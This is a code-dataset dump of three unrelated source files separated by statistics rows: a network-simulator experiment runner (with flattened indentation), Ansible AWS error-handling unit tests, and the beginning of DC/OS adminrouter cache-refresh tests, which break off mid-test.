flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: 1
use_random_jitter: 0
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast2 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 2
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast32 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast143 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all33 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all144 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
#qos_ratio = ['10,90', '20,80', '30,70', '40,60', '50,50', '60,40', '70,30', '80,20', '90,10']
qos_ratio = ['50,50']
#runs = ['incast32', 'all_to_all33', 'incast143', 'all_to_all144'] # no need to run incast in the 144 node
#runs = ['incast32', 'all_to_all33']
runs = ['incast2']
#runs = ['all_to_all144']
#burst_size = [1]
#burst_size = [1,2,4,8,16,32,64,128,256,512]
burst_size = [1000,2000,3000,4000,5000,6000,7000,8000,9000,10000]
## create the "./config" and "./result" by yourself :(
template = '../simulator 1 ./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt > ./result/result_{0}_{1}_{2}_B{3}_{4}.txt'
cdf_temp = './CDF_{}.txt'
cdf_RPC = ['uniform_4K', 'uniform_32K']
def getNumLines(trace):
out = subprocess.check_output('wc -l {}'.format(trace), shell=True)
return int(out.split()[0])
def run_exp(str, semaphore):
semaphore.acquire()
print template.format(*str)
subprocess.call(template.format(*str), shell=True)
semaphore.release()
threads = []
semaphore = threading.Semaphore(multiprocessing.cpu_count())
#semaphore = threading.Semaphore(multiprocessing.cpu_count() / 2) # save my poor laptop
for r in runs:
for cdf in cdf_RPC:
for ratio in qos_ratio:
for burst in burst_size:
num_flow = 1000000
#num_flow = 5000000 # use a larger number for all_to_all144
random_flow_start = 0 # 1: means exponential randomness in flow start time
# generate conf file
if r == 'incast32':
conf_str = conf_str_incast32.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast2':
conf_str = conf_str_incast2.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all33':
conf_str = conf_str_all_to_all33.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast143':
conf_str = conf_str_incast143.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all144':
conf_str = conf_str_all_to_all144.format(num_flow, cdf, ratio, burst, random_flow_start)
else:
assert False, r
# Note modify the config dir name
isrand = 'norand'
if (random_flow_start):
isrand = 'rand'
confFile = "./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt".format(r, cdf, ratio.replace(',', '_'), burst, isrand)
with open(confFile, 'w') as f:
#print confFile
f.write(conf_str)
threads.append(threading.Thread(target=run_exp, args=((r, cdf, ratio.replace(',', '_'), burst, isrand), semaphore)))
print '\n'
[t.start() for t in threads]
[t.join() for t in threads]
print 'finished', len(threads), 'experiments'
| 22.381166 | 132 | 0.751252 | 1,680 | 9,982 | 4.122024 | 0.141071 | 0.015596 | 0.029458 | 0.019061 | 0.819783 | 0.805776 | 0.778051 | 0.776751 | 0.776751 | 0.77083 | 0 | 0.097884 | 0.152575 | 9,982 | 445 | 133 | 22.431461 | 0.720771 | 0.065117 | 0 | 0.842407 | 0 | 0.005731 | 0.727897 | 0.131698 | 0 | 0 | 0 | 0 | 0.002865 | 0 | null | null | 0 | 0.011461 | null | null | 0.008596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
c7e53afca023bfa089a8815a51ffd058793cdb3c | 15,431 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/tests/unit/module_utils/core/ansible_aws_module/test_fail_json_aws.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 22 | 2021-07-16T08:11:22.000Z | 2022-03-31T07:15:34.000Z | venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/tests/unit/module_utils/core/ansible_aws_module/test_fail_json_aws.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/tests/unit/module_utils/core/ansible_aws_module/test_fail_json_aws.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 39 | 2021-07-05T02:31:42.000Z | 2022-03-31T02:46:03.000Z | # (c) 2020 Red Hat Inc.
#
# This file is part of Ansible
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
import botocore
import boto3
import json
from ansible.module_utils.common.dict_transformations import camel_dict_to_snake_dict
from ansible_collections.amazon.aws.plugins.module_utils.core import AnsibleAWSModule
class TestFailJsonAws(object):
# ========================================================
# Prepare some data for use in our testing
# ========================================================
def setup_method(self):
# Basic information that ClientError needs to spawn off an error
self.EXAMPLE_EXCEPTION_DATA = {
"Error": {
"Code": "InvalidParameterValue",
"Message": "The filter 'exampleFilter' is invalid"
},
"ResponseMetadata": {
"RequestId": "01234567-89ab-cdef-0123-456789abcdef",
"HTTPStatusCode": 400,
"HTTPHeaders": {
"transfer-encoding": "chunked",
"date": "Fri, 13 Nov 2020 00:00:00 GMT",
"connection": "close",
"server": "AmazonEC2"
},
"RetryAttempts": 0
}
}
self.CAMEL_RESPONSE = camel_dict_to_snake_dict(self.EXAMPLE_EXCEPTION_DATA.get("ResponseMetadata"))
self.CAMEL_ERROR = camel_dict_to_snake_dict(self.EXAMPLE_EXCEPTION_DATA.get("Error"))
# ClientError(EXAMPLE_EXCEPTION_DATA, "testCall") will generate this
self.EXAMPLE_MSG = "An error occurred (InvalidParameterValue) when calling the testCall operation: The filter 'exampleFilter' is invalid"
self.DEFAULT_CORE_MSG = "An unspecified error occurred"
self.FAIL_MSG = "I Failed!"
# ========================================================
# Passing fail_json_aws nothing more than a ClientError
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_client_minimal(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.ClientError(self.EXAMPLE_EXCEPTION_DATA, "testCall")
except botocore.exceptions.ClientError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.EXAMPLE_MSG
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert return_val.get("response_metadata") == self.CAMEL_RESPONSE
assert return_val.get("error") == self.CAMEL_ERROR
# ========================================================
# Passing fail_json_aws a ClientError and a message
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_client_msg(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.ClientError(self.EXAMPLE_EXCEPTION_DATA, "testCall")
except botocore.exceptions.ClientError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, msg=self.FAIL_MSG)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.FAIL_MSG + ": " + self.EXAMPLE_MSG
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert return_val.get("response_metadata") == self.CAMEL_RESPONSE
assert return_val.get("error") == self.CAMEL_ERROR
# ========================================================
# Passing fail_json_aws a ClientError and a message as a positional argument
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_client_positional_msg(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.ClientError(self.EXAMPLE_EXCEPTION_DATA, "testCall")
except botocore.exceptions.ClientError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, self.FAIL_MSG)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.FAIL_MSG + ": " + self.EXAMPLE_MSG
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert return_val.get("response_metadata") == self.CAMEL_RESPONSE
assert return_val.get("error") == self.CAMEL_ERROR
# ========================================================
# Passing fail_json_aws a ClientError and an arbitrary key
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_client_key(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.ClientError(self.EXAMPLE_EXCEPTION_DATA, "testCall")
except botocore.exceptions.ClientError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, extra_key="Some Value")
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.EXAMPLE_MSG
assert return_val.get("extra_key") == "Some Value"
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert return_val.get("response_metadata") == self.CAMEL_RESPONSE
assert return_val.get("error") == self.CAMEL_ERROR
# ========================================================
# Passing fail_json_aws a ClientError, and arbitraty key and a message
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_client_msg_and_key(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.ClientError(self.EXAMPLE_EXCEPTION_DATA, "testCall")
except botocore.exceptions.ClientError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, extra_key="Some Value", msg=self.FAIL_MSG)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.FAIL_MSG + ": " + self.EXAMPLE_MSG
assert return_val.get("extra_key") == "Some Value"
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert return_val.get("response_metadata") == self.CAMEL_RESPONSE
assert return_val.get("error") == self.CAMEL_ERROR
# ========================================================
# Passing fail_json_aws nothing more than a BotoCoreError
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_botocore_minimal(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.BotoCoreError()
except botocore.exceptions.BotoCoreError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.DEFAULT_CORE_MSG
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert "response_metadata" not in return_val
assert "error" not in return_val
# ========================================================
# Passing fail_json_aws BotoCoreError and a message
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_botocore_msg(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.BotoCoreError()
except botocore.exceptions.BotoCoreError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, msg=self.FAIL_MSG)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.FAIL_MSG + ": " + self.DEFAULT_CORE_MSG
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert "response_metadata" not in return_val
assert "error" not in return_val
# ========================================================
# Passing fail_json_aws BotoCoreError and a message as a positional
# argument
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_botocore_positional_msg(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.BotoCoreError()
except botocore.exceptions.BotoCoreError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, self.FAIL_MSG)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.FAIL_MSG + ": " + self.DEFAULT_CORE_MSG
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert "response_metadata" not in return_val
assert "error" not in return_val
# ========================================================
# Passing fail_json_aws a BotoCoreError and an arbitrary key
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_botocore_key(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.BotoCoreError()
except botocore.exceptions.BotoCoreError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, extra_key="Some Value")
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.DEFAULT_CORE_MSG
assert return_val.get("extra_key") == "Some Value"
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert "response_metadata" not in return_val
assert "error" not in return_val
# ========================================================
# Passing fail_json_aws BotoCoreError, an arbitry key and a message
# ========================================================
@pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
def test_fail_botocore_msg_and_key(self, monkeypatch, stdin, capfd):
monkeypatch.setattr(botocore, "__version__", "1.2.3")
monkeypatch.setattr(boto3, "__version__", "1.2.4")
# Create a minimal module that we can call
module = AnsibleAWSModule(argument_spec=dict())
try:
raise botocore.exceptions.BotoCoreError()
except botocore.exceptions.BotoCoreError as e:
with pytest.raises(SystemExit) as ctx:
module.fail_json_aws(e, extra_key="Some Value", msg=self.FAIL_MSG)
assert ctx.value.code == 1
out, err = capfd.readouterr()
return_val = json.loads(out)
assert return_val.get("msg") == self.FAIL_MSG + ": " + self.DEFAULT_CORE_MSG
assert return_val.get("extra_key") == "Some Value"
assert return_val.get("boto3_version") == "1.2.4"
assert return_val.get("botocore_version") == "1.2.3"
assert return_val.get("exception") is not None
assert return_val.get("failed")
assert "response_metadata" not in return_val
assert "error" not in return_val
| 47.92236 | 145 | 0.589528 | 1,750 | 15,431 | 4.983429 | 0.102857 | 0.086687 | 0.110079 | 0.132095 | 0.883385 | 0.873868 | 0.873868 | 0.873868 | 0.868134 | 0.868134 | 0 | 0.016385 | 0.224807 | 15,431 | 321 | 146 | 48.071651 | 0.712673 | 0.169075 | 0 | 0.822034 | 0 | 0 | 0.141962 | 0.006264 | 0 | 0 | 0 | 0 | 0.355932 | 1 | 0.04661 | false | 0 | 0.029661 | 0 | 0.080508 | 0.004237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c7efb68bfb3b66af4646f43eb56913cfa8d1c623 | 52,354 | py | Python | packages/adminrouter/extra/src/test-harness/tests/test_cache.py | rembik/dcos | 6ae0eed200e86f3ed30653696b97f8a637d59828 | [
"Apache-2.0"
] | null | null | null | packages/adminrouter/extra/src/test-harness/tests/test_cache.py | rembik/dcos | 6ae0eed200e86f3ed30653696b97f8a637d59828 | [
"Apache-2.0"
] | null | null | null | packages/adminrouter/extra/src/test-harness/tests/test_cache.py | rembik/dcos | 6ae0eed200e86f3ed30653696b97f8a637d59828 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) Mesosphere, Inc. See LICENSE file for details.
import copy
import logging
import time
import pytest
import requests
from generic_test_code.common import ping_mesos_agent, verify_header
from mocker.endpoints.marathon import (
SCHEDULER_APP_ALWAYSTHERE,
SCHEDULER_APP_ALWAYSTHERE_DIFFERENTPORT,
)
from mocker.endpoints.mesos import AGENT1_ID, EXTRA_AGENT_DICT
from runner.common import CACHE_FIRST_POLL_DELAY, Vegeta
from util import GuardedSubprocess, LineBufferFilter, SearchCriteria
log = logging.getLogger(__name__)
class TestCache:
def test_if_first_cache_refresh_occurs_earlier(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Executing cache refresh triggered by timer': SearchCriteria(1, False),
'Cache `[\s\w]+` empty. Fetching.': SearchCriteria(3, True),
'Mesos state cache has been successfully updated': SearchCriteria(1, True),
'Marathon apps cache has been successfully updated': SearchCriteria(1, True),
'marathon leader cache has been successfully updated': SearchCriteria(1, True),
}
# Enable recording for marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='record_requests')
# Enable recording for Mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
# Make regular polling occur later than usual, so that we get clear
# results.
ar = nginx_class(cache_poll_period=60, cache_expiration=55)
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
timeout=(CACHE_FIRST_POLL_DELAY + 1),
line_buffer=ar.stderr_line_buffer)
lbf.scan_log_buffer()
# Do a request that uses cache so that we can verify that data was
# in fact cached and no more than one req to mesos/marathon
# backends were made
ping_mesos_agent(ar, valid_user_header)
mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='get_recorded_requests')
assert lbf.extra_matches == {}
assert len(mesos_requests) == 1
assert len(marathon_requests) == 2
def test_if_cache_refresh_occurs_regularly(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Executing cache refresh triggered by timer': SearchCriteria(3, False),
'Cache `[\s\w]+` expired. Refresh.': SearchCriteria(8, True),
'Mesos state cache has been successfully updated': SearchCriteria(3, True),
'Marathon apps cache has been successfully updated': SearchCriteria(3, True),
'marathon leader cache has been successfully updated': SearchCriteria(3, True),
}
cache_poll_period = 4
# Enable recording for marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='record_requests')
# Enable recording for mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
# Make regular polling occur faster than usual to speed up the tests.
ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
# In total, we should get three cache updates in given time frame:
timeout = CACHE_FIRST_POLL_DELAY + cache_poll_period * 2 + 1
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
timeout=timeout,
line_buffer=ar.stderr_line_buffer)
lbf.scan_log_buffer()
# Do a request that uses cache so that we can verify that data was
# in fact cached and no more than one req to mesos/marathon
# backends were made
ping_mesos_agent(ar, valid_user_header)
mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='get_recorded_requests')
assert lbf.extra_matches == {}
assert len(mesos_requests) == 3
assert len(marathon_requests) == 6
def test_if_cache_refresh_is_triggered_by_request(
self, nginx_class, mocker, valid_user_header):
"""...right after Nginx has started."""
filter_regexp = {
'Executing cache refresh triggered by request': SearchCriteria(1, True),
'Cache `[\s\w]+` empty. Fetching.': SearchCriteria(3, True),
'Mesos state cache has been successfully updated': SearchCriteria(1, True),
'Marathon apps cache has been successfully updated': SearchCriteria(1, True),
'marathon leader cache has been successfully updated': SearchCriteria(1, True),
}
# Enable recording for marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='record_requests')
# Enable recording for mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
# Make sure that timers will not interfere:
ar = nginx_class(cache_first_poll_delay=120,
cache_poll_period=120,
cache_expiration=115)
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
timeout=5,
line_buffer=ar.stderr_line_buffer)
ping_mesos_agent(ar, valid_user_header)
lbf.scan_log_buffer()
# Do an extra request so that we can verify that data was in fact
# cached and no more than one req to mesos/marathon backends were
# made
ping_mesos_agent(ar, valid_user_header)
mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='get_recorded_requests')
assert lbf.extra_matches == {}
assert len(mesos_requests) == 1
assert len(marathon_requests) == 2
def test_if_broken_marathon_causes_marathon_cache_to_expire_and_requests_to_fail(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Marathon app request failed: invalid response status: 500':
SearchCriteria(1, False),
'Mesos state cache has been successfully updated':
SearchCriteria(2, False),
'Cache entry `svcapps` is too old, aborting request':
SearchCriteria(1, True),
}
ar = nginx_class(cache_max_age_soft_limit=3,
cache_max_age_hard_limit=4,
cache_expiration=2,
cache_poll_period=3,
)
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
